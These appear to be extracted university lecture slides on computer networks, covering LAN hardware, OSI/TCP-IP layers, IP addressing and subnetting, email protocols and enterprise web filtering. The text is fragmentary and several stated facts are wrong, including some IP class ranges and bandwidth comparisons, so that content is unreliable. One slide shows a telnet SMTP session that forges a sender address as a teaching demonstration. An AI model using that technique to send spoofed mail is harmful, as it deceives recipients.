Unit Iii
Unit Iii
INTRODUCTION TO COMPUTER
NETWORKS
3
• 1969 – 4
• 1971 – 15
• 1984 – 1000
• 1987 – 10,000
• 1989 – 100,000
• 1992 – 1,000,000
• 1996 – 10,000,000
• 2001 – 100,000,000
• By 2005… billions
4
Typical LAN “Local Area Network”
Hub or
switch
5
Client/Server Networks
• Client/Server network
6
Network Hardware
• The most essential networking hardware devices
for us to learn about are:
– Cables
– NICs
– Hubs
– Switches
– Routers
7
Wire Media
8
Media Bandwidth
Hubs
• A “hub” is a networking component that into which you can
plug in multiple network devices
– Connect computers, printers, scanners, etc.
• Anytime a connected device sends a network message, the
hub forwards the message to all other connected devices (not
just the intended recipient!)
– Unintended recipients should ignore bogus network traffic (akin to
“screening” telephone calls)
– Creates opportunities for deviant “packet sniffers”
• Hub can only deal with one message at a time, since it is
broadcast over all connections
11
Switches
• A switch is a network device which directs traffic only to its
intended destination(s) rather than to all devices on the
network.
– sometimes referred to as an “intelligent hub”
A Network Switch
Switch receives
data
and sends
Switch it back out
Switch sends
Station A signal out to a
Transmits single Port
to Station C
Switches
Routers
Different networks connect via routers (not switches or hubs)
Routers even connect networks based on different protocols, which is important
since not all networks use the same protocol.
Network X
Switches
Routers
Network Z
Switches
15
Gateway router
• When your computer needs to contact a computer
that is not within the immediate network (i.e., your
LAN), then your computer’s networking software is
configured to send the request to a particular router
called a:
– Default Gateway, or
– Gateway router
• For each of us, the most noteworthy role of the
gateway router is to connect your computer’s LAN to
your ISP’s larger network so that your computer
accesses the Internet
• Therefore, a gateway router is your computer’s
onramp to the Internet.
16
Standard networking protocols
(communications standards)
• The committee that addresses LAN standards is called the
IEEE 802 Committee.
– Thus, IEEE LAN protocols always start with the number 802.
• “Ethernet” is a particular protocol published by this
committee as their “802.3” protocol.
– Ethernet (802.3) is the world’s #1 standard wired-LAN protocol
– There are other protocols besides Ethernet, but it is dominant
• Most PCs’ NICs support 10/100/1000 Mbps Ethernet.
17
Packet switching
• The Ethernet (IEEE 802.3) standard transmits data in little
chunks called packets
• Break long messages into short “packets”
– Keeps one user from hogging a line
– Each packet is tagged with where it’s going
• Route each packet separately
– Each packet often takes a different route
– Packets often arrive out of order
– Receiver must reconstruct original message
18
TCP/IP
• Transmission Control Protocol/Internet Protocol (TCP/IP)
provides the technical foundation for the public Internet as
well as for large numbers of private network. It is defined in
terms of layers.
• Do you use TCP/IP?
– If you are on the Internet, yes, you are using TCP/IP.
• TCP/IP layers (at left, with particular implementations at
right)
19
Packet
IP Address IP Address
Sender Field Destination Field
20
http://www.yougetsignal.com/tools/visual-tracert/
21
Wireless networking
• Wireless fidelity (wi-fi) – a means of linking computers into a
wireless local area network (WLAN)
• Also referred to as 802.11
• Wi-Fi has evolved through various standards, the most
common of which have been:
– 802.11b, with 11 Mbps bandwidth
24.48.0.1
From
24.48.0.1 Your router’s NAT feature modifies your outgoing
packets such that their source IP becomes 24.48.0.1.
Your BFF’s chat program thus sends its response to
24.48.0.1
24.48.0.1. (Your router’s NAT function also changes
the destination IP on the response packets it later
From receives from your BFF to 192.168.0.1.
192.168.0.1
You Your BFF
192.168.0.1 12.6.1.3
27
Corporate Router
with Port Mapping 224.60.32.1
24.48.0.1 and NAT activated
224.60.32.1:21 224.60.32.1:80
FTP
server Web
You server
Problems:
• Speed
• Reliability
• Security
36
36
38
38
41
41
The 1960s
43
42
1971
44
43
1973
45
44
Growing Pains
• Problem: early networks used incompatible
protocols
46
45
Trivia
• Kahn believed that there would
only be ~20 networks.
• He was way off.
• Why?
48
47
2000
49
48
2006
50
49
2009
51
50
52
51
53
52
Takeaways
• Communication is fundamental to human nature
• Key concepts have existed for a long time
– Speed/bandwidth
Encoding
– Latency
– Switching Cable
management
– Multiplexing
Packets vs. circuits
• The Internet has changedthe world
Routing
– Promise of free ($) and free (freedom) communication
– Shrunk the world
• What made the Internet so successful? Stay tuned!
54
Introduction to Computer Networks 53
Computer Networks
Computer network connects
two or more autonomous
computers.
Applications of Networks
Resource Sharing
Hardware (computing resources, disks, printers)
Software (application software)
Information Sharing
Easy accessibility from anywhere (files, databases)
Search Capability (WWW)
Communication
Email
Message broadcast
Remote computing
Distributed processing (GRID Computing)
Introduction to Computer Networks 56
Network Topology
The network topology
defines the way in which
computers, printers, and
other devices are
connected. A network
topology describes the
layout of the wire and
devices as well as the
paths used by data
transmissions.
Introduction to Computer Networks 57
Bus Topology
Commonly referred to as a
linear bus, all the devices
on a bus topology are
connected by one single
cable.
Introduction to Computer Networks 58
Ring Topology
A frame travels around the ring,
stopping at each node. If a node wants
to transmit data, it adds the data as
well as the destination address to the
frame.
The frame then continues around the
ring until it finds the destination node,
which takes the data out of the frame.
Single ring – All the devices on the
network share a single cable
Dual ring – The dual ring topology
allows data to be sent in both
directions.
Introduction to Computer Networks 60
Mesh Topology
The mesh topology
connects all devices
(nodes) to each other for
redundancy and fault
tolerance.
It is used in WANs to
interconnect LANs and for
mission critical networks
like those used by banks
and financial institutions.
Implementing the mesh
topology is expensive and
difficult.
Introduction to Computer Networks 61
Network Components
Physical Media
Interconnecting Devices
Computers
Networking Software
Applications
Introduction to Computer Networks 62
Networking Media
Networking media can be
defined simply as the
means by which signals
(data) are sent from one
computer to another
(either by cable or wireless
means).
Introduction to Computer Networks 63
Networking Devices
HUB, Switches, Routers,
Wireless Access Points,
Modems etc.
Introduction to Computer Networks 64
Applications
E-mail
Searchable Data (Web Sites)
E-Commerce
News Groups
Internet Telephony (VoIP)
Video Conferencing
Chat Groups
Instant Messengers
Internet Radio
OSI Model 67
OSI MODEL
OSI Model
68
Communication Architecture
Strategy for connecting host computers and other
communicating equipment.
Defines necessary elements for data communication
between devices.
A communication architecture, therefore, defines a
standard for the communicating hosts.
A programmer formats data in a manner defined by the
communication architecture and passes it on to the
communication software.
Separating communication functions adds flexibility, for
example, we do not need to modify the entire host software
to include more communication devices.
OSI Model
69
Layer Architecture
Layer architecture simplifies the network design.
It is easy to debug network applications in a layered
architecture network.
The network management is easier due to the layered
architecture.
Network layers follow a set of rules, called protocol.
The protocol defines the format of the data being
exchanged, and the control and timing for the handshake
between layers.
OSI Model
70
Physical Layer
Provides physical interface for transmission of information.
Network Layer
Implements routing of frames (packets) through the
network.
Defines the most optimum path the packet should take from
the source to the destination
Defines logical addressing so that any endpoint can be
identified.
Handles congestion in the network.
Facilitates interconnection between heterogeneous
networks (Internetworking).
The network layer also defines how to fragment a packet
into smaller packets to accommodate different media.
OSI Model
77
Transport Layer
Purpose of this layer is to provide a reliable mechanism for
the exchange of data between two processes in different
computers.
Session Layer
Session layer provides mechanism for controlling the dialogue
between the two end systems. It defines how to start, control and
end conversations (called sessions) between applications.
This layer requests for a logical connection to be established on
an end-user’s request.
Any necessary log-on or password validation is also handled by
this layer.
Session layer is also responsible for terminating the connection.
This layer provides services like dialogue discipline which can be
full duplex or half duplex.
Session layer can also provide check-pointing mechanism such
that if a failure of some sort occurs between checkpoints, all data
can be retransmitted from the last checkpoint.
OSI Model
79
Presentation Layer
Presentation layer defines the format in which the data is to
be exchanged between the two communicating entities.
Also handles data compression and data encryption
(cryptography).
OSI Model
80
Application Layer
Application layer interacts with application programs and is
the highest level of OSI model.
Application layer contains management functions to
support distributed applications.
Examples of application layer are applications such as file
transfer, electronic mail, remote login etc.
OSI Model
81
OSI in Action
A message begins at the top application
layer and moves down the OSI layers to
the bottom physical layer.
As the message descends, each
successive OSI model layer adds a
header to it.
A header is layer-specific information
that basically explains what functions
the layer carried out.
Conversely, at the receiving end,
headers are striped from the message
as it travels up the corresponding
layers.
TCP/IP Model
82
TCP/IP MODEL
TCP/IP Model
83
TCP/IP Model
Application Layer
Application programs using the network
Transport Layer (TCP/UDP)
Management of end-to-end message transmission,
error detection and error correction
Network Layer (IP)
Handling of datagrams : routing and congestion
Data Link Layer
Management of cost effective and reliable data delivery,
access to physical networks
Physical Layer
Physical Media
85
The Internet
Introductory material.
An overview lecture that covers Internet related topics, including a
definition of the Internet, an overview of its history and growth, and
standardization and naming.
86
A Definition
• On October 24, 1995, the FNC unanimously passed a
resolution defining the term Internet.
89
88
90
89
91
90
1000000000
Number of Hosts on the Internet
100000000
10000000
1000000
100000
10000
1000
100
Aug-81
Aug-83
Aug-85
Aug-87
Aug-89
Aug-91
Aug-93
Aug-95
Aug-97
Aug-99
Aug-01
Source: Internet Software Consortium
92
91
Internet Infrastructure
IXP
local ISP IXP
Backbone Network
corporate campus
local ISP
network network
93
92
Telecommunications
&
The Internet
93
Computer Computer
Computer Computer
Digital Digital
signals signals
Modem Modem
Audio Phone Lines
Analog signals
95
Channels
• Twisted wire (twisted pair)
• Coaxial Cable
• Fiber Optics
• Microwave
• Newer Wireless
96
Twisted Pair
• Low cost
• easy to work with
• installed infrastructure
• crosstalk
• 300bps to 100Mbps
• “This modem is 56Kbps capable. However, current
regulations limit download speeds to 53Kbps,” the fine print
from a typical modem advertisement.
97
DSL
• Uses existing twisted pair
• 256Kbps to 40Mbps
• Loop length max about 18,000 ft.
• More correctly ADSL (Asymmetric Digital
Subscriber Line) with download speeds
different from upload speeds.
98
Coaxial Cable
• More expensive
• harder to work with
• not as extensive an existing infrastructure
– cable TV companies are changing this
• 56Kbps to 550Mbps
99
Fiber Optics
• Very expensive
• difficult to work with
• existing infrastructure limit to backbones
• 500Kbps to 30Gbps
100
Microwave
• Not as expensive as land lines
• Limited to line of site, (towers)
– reasonable infrastructure
• Satellite bounce, increases expense
– geo-synchronous (22,000 miles)
– low earth orbit (cheaper, lower power)
• 256Kbps to 100Mbps
101
Newer Wireless
– Cellular
– mobile data networks
– personal communications services (PCS)
Transmission Speed
• BPS, bits-per-second, the amount of
information that can be transmitted through a
channel
• BAUD - a binary event, a signal change from
positive to negative or vice versa.
103
Speed II
• At higher speeds a single signal change can
transmit more than one bit at a time, so the
bit rate will generally be higher that the baud
rate.
• Transmission capacity is a function of the
frequency, higher frequency means higher
capacity
104
More Speed
• Bandwidth = range of frequencies that a
channel can support (difference between
highest and lowest frequency).
• Greater range means greater bandwidth.
• Greater bandwidth means greater
transmission capacity.
105
Faster Yet
• Bandwidth is like pipe diameter.
• Larger diameter pipes can transmit more
water in a given period of time.
• Personal Communication Services, PCSs, have
a greater bandwidth than fiber optics.
106
Communications Processors T
Computer
T
Front End Concentrator
Controller Processor Channel
T
C
h T
CPU a
n
n
e
l
Multiplexer
PC PC PC
107
Network Topology
C
• Star Network C C P
• Bus Network C C C P
C P
• Ring Network C C
C C
108
Networks
• Local Area Network, LAN
• Wide Area Network, WAN
• Value Added Network, VAN
109
Network Terms
• File server
• Print server
• Gateway - connects dissimilar networks
• Bridge - connects similar networks
• Routers - connects networks & directs traffic
• Similar networks = same network protocols
110
Transmission on LANs
• Token Ring
– can talk only when you have the token
– cost more than Ethernet
– better for high volume traffic
• Ethernet
– talk whenever you want
– send again if collision
– works best with low volume traffic
Chapter 8 20
111
Internet Capabilities
Centurylink
Tier 1 Networks
• The largest backbones on the Internet:
• Centurylink, Telecom Italia, Verizon, Sprint,
TeliaSonera International, NTT Communications,
Deutsche Telekom, Level 3, AT&T
• These top branded backbones only trade peering
traffic among themselves.
117
Common Bandwidths
• 56K modem 0.056 Mbps
• ADSL 40 Mbps
• Cable Modem 50 Mbps
• T1 1.5 Mbps
• Ethernet 10 to 1,000 Mbps
• T3 44.7 Mbps
• See http://bandwidthplace.com/
118
Intranets
• An internal network based on World Wide
Web technology
• Firewall
– security software to prevent unauthorized
access to an intranet
• Firebreak
– a physical break between the Internet and
Intranet
121
IP Addresses
• An identifier for a computer or device on a
TCP/IP network. Networks using the TCP/IP
protocol route messages based on the IP
address of the destination. The format of an IP
address is a 32-bit numeric address written as
four numbers separated by periods. Each
number can be zero to 255. For example,
1.160.10.240 could be an IP address.
122
IP Address Registries
125
124
Internet Infrastructure
• Location where a network (ISP, corporate
network, or regional network) gets access to the
Internet is called a Point-of-Presence (POP).
• Locations (Tier-1 or Tier-2) networks are
connected for the purpose of exchanging traffic
are called peering points.
– Public peering: Traffic is swapped in a specific
location, called Internet exchange points (IXPs)
– Private peering: Two networks establish a direct link
to each other.
126
125
127
126
Organization of a single node in a Tier-1 network
Peering points
Leased links
....
to customers
3Com
Bay Networks
3Com
Leased links
....
SD
3Com
Leased links
....
to customers
3Com
Metropolitan
....
area networks
Dial-up and
leased links
....
Modem Bank
to customers
128
127
129
128
130
129
Assigning Identifiers for the Internet
131
130
Review
131
• E-mail
• Research
• Shopping
• News
• Games
• Ed-line
134
Internet Terms
• WWW
• Browser
• Search Engine
• URL
• Domain
• html
138
WWW
• The World Wide Web
139
Browser
• Software program that allows a person
to view WWW documents. Examples of
browsers are Netscape, Microsoft
Internet Explorer, Mosaic, Mac web,
and Net cruiser.
140
Search Engine
• A web site that will help you search the
Internet for key words, subjects, etc.
142
URL
• UNIFORM RESOURCE LOCATOR- The
unique address of any web page. It tells
your computer where the information is
stored so it can be viewed.
144
Domain
• A way to indicate what type of site you may
be viewing. In the U.S. some common domains
are .com-commercial, .org- non-profit and
research organizations, .gov- government
agency, .edu-education. More are constantly
being added so theses should only be used as
guidelines to help you know what type of site
you are on.
146
Internet Connection
• Logistic (ICT Manager) will ensure internet services those are using ACF
email service and computer.
• Missions standard is using Local Area Networks connection through
network cable and wireless access points (Wifi).
• Local Area Networks provides internet access to computers and other
devices in a limited area. This connection established by wire or wireless.
2016 148
147
INTERNET
Cable or DSL or
Vsat or BLR
modem
Router WAN
LAN
Switch
Wireless Access
point
August 19, 2021 149
148
LAN problems
Wi-Fi (Wireless Fidelity)
2016 150
149
LAN Problems
• Wi-Fi or LAN is not connected.
• Wireless might have disabled
• Cable disconnected if you are using patch cord for network
connectivity
• Difference when using cable and Wi-Fi
• Wi-Fi
• Cable
2016 151
150
Popular
Search Engines
Worldwide
152
1 - Google
• According to the latest netmarketshare report (January
2018) 74.52% of searches were powered by Google and
only 7.98% by Bing.
• Google is also dominating the mobile/tablet search engine
market share with 93%!
• Want to learn how to take advantage of Google’s search
engine share?
– Read: How long does it take to rank in Google
153
2 - Bing
• Bing is Microsoft’s attempt to challenge Google in the area
of search.
• Despite their efforts they still did not manage to convince
users that their search engine can produce better results
than Google.
154
3 - Yahoo! Search
4 - Ask
• Formerly known as Ask Jeeves, Ask.com receives approximately
0.05% of the search share.
• ASK is based on a question/answer format where most
questions are answered by other users or are in the form of
polls.
• It also has the general search functionality but the results
returned lack quality compared to Google or even Bing and
Yahoo.
156
5 - Aol Search
• According to netmarketshare the old time famous AOL is
still in the top 10 search engines with a market share that
is close to 0.04%.
• The AOL network includes many popular web sites like
engadget.com, techchrunch.com and the
huffingtonpost.com.
157
6. Baidu
• Baidu was founded in 2000 and it is the most popular
search engine in China.
• It’s market share is increasing steadily and according to
Wikipedia, Baidu is serving billion of search queries per
month.
• It is currently ranked at position 4, in the Alexa Rankings.
158
7. Wolframalpha
• Wolframalpha is different that all the other search
engines.
• They market it as a Computational Knowledge Engine
which can give you facts and data for a number of topics.
• It can do all sorts of calculations, for example if you
enter “mortgage 2000” as input it will calculate your loan
amount, interest paid etc. based on a number of
assumptions.
159
8. DuckDuckGo
9. Internet Archive
Dogpile
• Since the last two don’t work, let’s try one that does.
163
• Lynx.. Lou Montulli released the web browser Lynx 2.0 in March,
1993.
QuickTime™ and a
TIFF (Uncompressed) decompressor
are needed to see this picture.
172
• The Mozilla project was created in 1998 with the release of the
Netscape browser suite source code that was intended to harness
the creative power of thousands of programmers on the Internet.
176
What Groups are Responsible for
Managing it?
• Instead of just working on Netscape's next browser, people started
creating a variety of browsers, development tools and a range of other
projects.
• In ten years the community has shown that commercial companies can
benefit by collaborating in open source projects and that great end user
products can be produced as open source software.
QuickTime™ and a
TIFF (Uncompressed) decompressor
are needed to see this picture.
186
Future Technology
• Worldwide Market Shares
• Influence of Google Chrome
• Competition amongst Web Browsers
192
Addressing
An IP address is 32-bit long.
• It is usually written as four decimal numbers separated by
dots (periods) (dotted decimal notation)
• In hex, each of the four hexadecimal numbers is called an
octet.
• Example: 137.207.192.003 or 89 CF C0 03
• An IP address contains a network part and a host part.
• The number of address bits used to identify the network, and
the number to identify the host, vary according to the class of
the address.
• Routers or gateways have one or more addresses
(depending on the no. of links they have) The three main
address classes are class A, class B, and class C.
• By examining the first few bits of an address, IP software can
quickly determine the address class, and therefore its structure.
IP Addressing 193
Note:
For Class A: Have a first dotted decimal number in the range 1-126
For Class B: Have a first dotted decimal number in the range 128-191
For Class C: Have a first dotted decimal number in the range 192-223
194
IP Addressing
• There are five forms of IP addresses:
Class A :126 networks, each can have up to (16M-2) nodes.
(1.0.0.0 - 126.0.0.0)
Class B: (16K-2) networks, each can have up to (64K-2) nodes
(127.0.0.0 - 191.255.0.0)
Class C: (2M-2) networks, each can have up to 254 nodes.
(192.0.0.0 - 223.255.255.0)
Class D: a multicast address.
(224.0.0.0 - 240.0.0.0)
Class E: reserved for future use.
(241.0.0.0 - 248.0.0.0)
195
IP address format
196
IP address
For example:
The address (binary) - 10000000 00000111 00001111 00000001
has the DECIMAL DOT NOTATION: 128.7.15.1
It belongs to Class B addresses.
Its Network-id is: 128.7
Its Host-id is: 15.1
197
IP Addresses assignment example
198
Class A
|_|_______| |________________________|
7 bits 24 bits
Network Host
Part Part
200
Class A
Summary:
Class B
Class B
|__| first two bits are used to determine the class to which an address
belongs to for class B address.
|__|______|________| |________________|
14 bits Network part 16 bits Host part
Summary:
Class C
|___| first three bits are used to determine the class to which an
address belongs to for class C address.
|________| 8 bits are used for host address. Therefore, each Class C
network can have 2 8 = 256 hosts.
206
Class C
Summary:
Summary
• Class A:Few networks, each with many hosts.
• Class B: Medium number of networks, each
with a medium number of hosts
• Class C: Many networks, each with a few
hosts.
208
Loopback Address
• IP defines a loopback address used to test network applications.
• Programmers often use loopback testing for preliminary
debugging after a network application has been created.
• To perform a loopback test, a programmer must have two
application programs that are intended to communicate across a
network.
• Each application includes the code needed to interact with
TCP/IP protocol software.
• Instead of executing each program on a separate computer, the
programmer runs both programs on a single computer and
instructs them to use a loopback IP address when
communicating.
209
Loopback Address
• When one application sends data to another, data travels
down the protocol stack to the IP software and then IP
software forwards it up through the protocol stack to the
second program.
• Thus programmer can test the program logic quickly
without using two computers and without sending packets
across the network.
• During loopback testing, packets do not leave a computer
and the Ip sofware forwards the packets from one
application to another application.
• The loopback address never appears in a packet travelling
across a network.
210
Address Depletion
• The TCP/IP designers did not think about the enormous scale of
today's network.
• When TCP/IP was being designed, networking was limited to
large organizations that could afford substantial computer
systems.
• The idea of a powerful UNIX system on every desktop, or X-
terminal or a PC with X-Ware (PC software to emulate X-
terminal) did not exist.
• At That time, a 32-bit address seemed so large that it was
divided into classes to reduce the processing load on routers.
213
Address Depletion
• For example, assigning a large network a single class B address,
instead of few class C addresses, reduces the load on the router,
because the router only needs to keep one route for that entire
organization.
• However, the organization that was given the class B address
probably does not have 64,000 computers, so most of the host
addresses available to the organization will never be assigned.
• The current design, which favors routers over growth, is under
critical strain from the rapid growth of the Internet. At the present
rate of growth, all class B addresses could be exhausted soon!.
• To prevent this, blocks of class C addresses are being assigned to
organizations, but each class C address requires its own entry
within the routing table.
• This solution could cause the routing table to grow so rapidly that
the routers will soon be overwhelmed.
214
Address Depletion
These problems are being addressed by the ROAD (Routing and Addressing)
working group of the Internet Engineering Task Force (IETF). They are looking for a
scheme that:
• It will improve the problem of address depletion,
perhaps by moving to a larger address, 160-bit address!
• Classless addresses.
• Implementation of new routers, without requiring
changes to the end-systems (the hosts).
We don't know what technique will be adopted by the IETF to overcome the
problems of address depletion. However, according to them, whatever happens,
the changes should not have any near-term effect on your hosts, and IP
addressing will be same at least for some time.
215
Why subnetting?
• Preservation of address space
• Control network traffic, avoid collisions
• Reduce the routing complexity
• Improve network performance
• Security
216
Subnetting
Subnetting is a method for getting the most out of the limited 32-bit IP addressing
space. With any address class, subnetting provides a mean of allocating a part of the
host address space to network addresses, which will let you have more networks. The
part of the host address space allocated to new network addresses is known as the
subnet number.
The InterNIC assigned the University of Windsor one class B Network address, which is
137.207.0.0 with network number part 137.207. The Host number part is left to be
assigned by the local management - The Computing Services)
217
Subnetting
218
Subnetting
• In class B IP address, the 2 right-hand bytes assigned for the host
number, can be subdivided into 254 subnetworks and 254 hosts to
each subnetwork number.
• Which bits in the host address bytes will be applied to subnet
addresses and which to host addresses is determined by a subnet
mask, or netmask.(/etc/netmasks)
• The netmask can be applied to an IP address using the bitwise
logical AND operator.
• If a netmask 255.255.255.0 (or FF.FF.FF.00) is applied to the
address 137.207.192.003 (or 89 CF C0 03), the result is a network
number 137.207.192.0
i.e.: 137.207.192.003 & 255.255.255.000
= 137.207.192.000
or, 89 CF C0 03 & FF FF FF 00
= 89 CF C0 00.
Subnetting 219
Now the system (router or server) will look for a network number of 137.207.192.000
instead of a network number of 137.207., then the router (or the server) will locate the
host (workstation) from its table, and adds the corresponding machine number to get
137.207.192.003. To increase the host number from 254, a different mask number could
be used for less subnetworks and more hosts.
220
• TCP/IP
• Addressing Schemes
• Every computer and network on the Internet uses the same protocols
(rules and procedures) to control timing and data format.
• When you use the Internet, your PC (a client) requests data from a host
system. The request and data are broken into packets and travel across
multiple networks before being reassembled at their destination.
232
• Each IP address has four parts – each part a number between 0 and 255.
An IP address might look like this: 205.46.117.104.
235
• A domain name identifies the type of institution that owns the computer.
An Internet server owned by IBM might have the domain name ibm.com.
• News
• Telnet
• Electronic mail (e-mail) is the most popular reason people use the
Internet.
• To use e-mail, a user must have an e-mail address, which you create by
adding your user name to the
e-mail server's domain name, as in [email protected].
246
Example of Telnet (Character mode)
26.248
Image from Dr. Wang’s course at:
http://www.cse.scu.edu/~mwang2/tcpip/
247
Some Common Features of Telnet
26.249
248
Telnet Commands
26.250
249
SSH – Secure Shell
26.251
250
SSH – Secure Shell
26.252
251
SSH Programs and Usages
26.253
252
26-2 ELECTRONIC MAIL
26.255
254
Note
When the sender and the receiver of an e-mail are on the same system,
we need only two user agents.
26.256
255
Note
When the sender and the receiver of an e-mail are on different systems, Wikipidia
shows a good example of email operation (next page)
26.257
256
Typical Email Operation (from Wikipidia)
26.259
258
26.260
259
Note
Some examples of command-driven user agents are mail, pine,
and elm (under Unix).
26.261
260
Note
Some examples of GUI-based user agents are Eudora, Outlook, and Netscape.
26.262
261
Figure 26.12 Format of an e-mail
26.263
262
• Sender uses DNS query for MX record on the domain name in order to find the
name and IP of the target email server
26.264
263
MIME
• User agents makes the translation between non-ASCII data and ASCII email
message
• If you check the source file of an email that has attachment, you will find the MIME
usage
• This is the main reason why your email with an attachment becomes bigger?
26.266
265
26.267
266
Table 26.5 Data types and subtypes in MIME
26.268
267
26.269
268
POP3 or IMAP4
26.270
269
26.271
270
26.272
Table 26.7 Commands 271
26.273
272
Table 26.8 Responses
26.274
273
Table 26.8 Responses (continued)
26.275
Example 26.3
274
Through this process, you can see why you cannot trust the
“sender” or any part of a received email, why email spam
is so easy to be generated.
26.276
275
Sample email sending using telnet
“telnet longwood.cs.ucf.edu 25”
C: HELO fake.domain
S: 250 Hello crepes.fr, pleased to meet you
C: MAIL FROM: <[email protected]>
S: 250 [email protected]... Sender ok
C: RCPT TO: <[email protected]>
S: 250 [email protected] ... Recipient ok
C: DATA
S: 354 Enter mail, end with "." on a line by itself
C: from: “fake man” <[email protected]>
C: to: “dr. who” <who@who>
C: subject: who am I?
C: Do you like ketchup?
C: How about pickles?
C: .
S: 250 Message accepted for delivery
C: QUIT
S: 221 longwood.cs.ucf.edu closing connection
276
26.280
279
• Do not try to use telnet on department email server except for the homework!
• Do not try to use it to spam your friends without upfront notice!
26.281
280
Figure 26.19 POP3 (Post Office Protocol) and IMAP4 (Internet Mail Access
Protocol)
26.282
281
Figure 26.20 The exchange of commands and responses in POP3
26.283
282
POP3 protocol (tcp: 110)
S: +OK POP3 server ready
C: user bob
authorization phase S: +OK
C: pass hungry
• client commands:
S: +OK user successfully logged on
– user: declare username
– pass: password C: list
S: 1 498 Length(bytes)
• server responses S: 2 912
– +OK S: .
– -ERR C: retr 1
S: <message 1 contents>
transaction phase, client: S: .
• list: list message numbers C: dele 1
• retr: retrieve message by C: retr 2
number S: <message 1 contents>
• dele: delete S: .
• quit C: dele 2
C: quit
S: +OK POP3 server signing off
Telnet example 284
283
26.285
284
Web-based Email
• Email clients use web browser for all interactions
• A user can access his/her email at any where, via any computer that has Internet
access
• Email provider may provide more functions
• Gmail has very good search capability
• Gmail has the message grouping function
• Many provide bundled services with their other products
• Voice/video, photo sharing, ….
26.286
285
26-3 FILE TRANSFER
26.287
286
Note
FTP uses the services of TCP. It needs two TCP connections.
The well-known port 21 is used for the control connection and the well-known port
20 for the data connection.
26.288
287
26.289
288
26.290
289
26.291
Example 26.4 (continued)
290
26.292
Example 26.5
291
26.293
Example 26.5 (continued)
292
26.294
293
Dying of FTP
26.295
294
Hypothetical Example
• A video file (VF) resides in your computer.
• Assume the computer is always offline, is immune to
digital forensics, and can only be accessed by you.
– VF: S, P, A
• You allow others to use your computer.
– VF: !S, !P, !A
• You encrypt the file (homebrew)
– VF: S, !P, !A
• You implement user control, others cannot access the
file
– VF: S, P, !A
• You hide the file from other users
– VF: S, P, A
297
The Problem
• Networks greatly complicate security, privacy, and
anonymity
• A known (not anonymous) file breaches privacy
and risks security
• A non-private file breaches anonymity and risks
security
• An insecure file risks privacy and anonymity
• Uploading that video file from the previous
example to a website like YouTube throws
anonymity right out the window
298
Private Browsing
• Unlike normal browsing, no information is stored about
you
• Private Sessions are “sandboxed” from normal sessions
• Plugins may or not be private
• Still vulnerable to:
– Search engines
– Websites that collect/share info about you (read: most
websites)
– Malware
– Internet Service Provider (ISP) surveillance
– Physical surveillance
301
Private Browsing++
• NoScript: Control exactly what scripts (plugins)
run on your computer
• AdBlock Plus: Keep ads and adware from
executing on your computer
• Abine’s Blur: Anti-Trackers, Autogenerated Proxy
Email Addresses, Passwords, and Credit Card
Numbers,
• ShodanHQ and ScamAdvisor.com: Check where a
website is and if it is legitimate.
• CCleaner and others: Customizable local data
management
302
Mobile Anonymity
• Anonymity does not
automatically transfer to
mobile devices!
• You have to manually
configure everything
again…..
• Browsers: DuckDuckGo (or
configure others
browsers)
• Proxy: Orbot
• VPN: OpenVPN
• Root/Jailbreak for full
control!
305
Client Proxy
Byte Caching
Logging Protocol
Authentication detection BW
management
Policy
Clients Internet
Caching
Antivirus Protocol Compression
URL-Filtering
optimization
306
Application proxy
Streaming AOL-IM
HTTP & HTTPS Yahoo-IM
FTP
MSN-IM
Internet
MAPI
.mp3
CIFS .xxx
gral.se
?
P2P
Telnet/Shell DNS TCP-Tunnel SOCKS
307
How We Secure the Web
Intranet Public
Web Web
Server Server
Internal
Network Public Internet
Clients
Internet
Internal
Network
Public Internet
Internal
Network
Public Internet
Content Filtering
• Organizations need to control what users are doing when accessing the
internet to protect from legal liability and productivity risks
• Blue Coat and our partners enable
enterprise-class content filtering
– Powerful granular user control using
Blue Coat’s Policy Processing Engine
• By user, group, destination IP and/or URL,
time of day, site, category, lots more
– Multiple logging and reporting options
– Integrates with all authentication
(LDAP, RADIUS, NTLM, AD, 2-factor, etc)
– Coaching, warnings, etc.
– High performance with integrated caching
– Drop-in appliance for easy to deploy and manage
– De-facto industry content filtering platform
312
Content filtering databases
Clients
Internet
HTTP Compression
ProxySG can support a mixed mode of HTTP compression operation
Original Content Server (OCS) or Core ProxySG can send either (de)compressed content to edge or
core ProxySG using GZIP or Deflate algorithms
Core ProxySG compressed
compressed
compressed Edge ProxySG
uncompressed uncompressed
uncompressed
Remote Office
HQ Office
compressed
compressed ProxySG
uncompressed
Enterprise uncompressed
Internet
315
BENEFITS
Protect performance of mission critical applications
• SAP, ERP apps
Prevent bandwidth greedy applications from impacting other applications
• P2P
Provision bandwidth for applications that require a per-session amount of
bandwidth
• Streaming
Balance necessary and important, bandwidth intensive, applications
• HTTP, IM
316
How We Secure the Web
Intranet Public
Web
Server Web
Server
Internal
Network
Public Internet
AAA: User logs onto network
and is authenticated via NTLM,
Bandwidth management:
Compression, Bandwidth
AD (Single-Sign-on), LDAP, management and Streaming
Radius, Forms, local password. media Caching and Splitting.
Policy Processing Engine: All
user web application requests Web Virus scanning: Potentially
harmful content entering
are subjected to granular
security policy network via HTTP, HTTPS and
Content Filtering: Requests for FTP
content are controlled using is stripped or scanned
by ProxyAV.
content filtering based on
granular policy
317
Virus, Code & Script scanning
Other ICAP servers
Clients
Internet
Sophos McAfee
ProxyAV
Kaspersky Panda
318
ProxyAV
ProxySG & ProxyAV
- Large Enterprise/Network Core
- Scan once, serve many (cache benefit)
Internet
• Streaming
– Microsoft Streaming & Native RTSP
– Live Stream split, VOD Stream cache
– Rich Streaming features, Unicast-Multicast
– Scheduling live streaming from VOD
• Enhancements
– Store, Cache & distribute
Video On Demand
– Schedule VOD content to
be played as Live Content
– Convert between Multicast-Unicast
– Authenticate Streaming users
To NTLM, Ldap, RADIUS+Onbox
325
How We Secure the Web
Intranet Public
Web
Server Web
Server
Internal
Network Public Internet
Reporter
327
The Internet
The internet today consists of 350 million webservers.
350 Million
328
Generation 1
The first generation of content filters consisted of
static manually managed lists of popular pornographic
and unproductive websites. Very often retreived from 1 Million
access logs, popular bad sites where banned.
Generation 2
Corporations relised they could make money of a list
and started to collect lists and logs from the web, manually
rating these in larger scale. More categories where added 15 Million
to increase value. The systems started to collect URL:S
autmatically and download new lists periodicly. Some
of them even many times every day.
335 Million
330
Generation 2
Number of URL:s was in the numbers of 10-20 millions.
Hitrates in logsystems presented was in the numbers of
50-80%. Regular expression on URL:s and other tricks 15 Million
sometimes gave a false picture of rating over 90%. But in
fact less than 5% of the Internet was covered.
335 Million
331
Generation 3
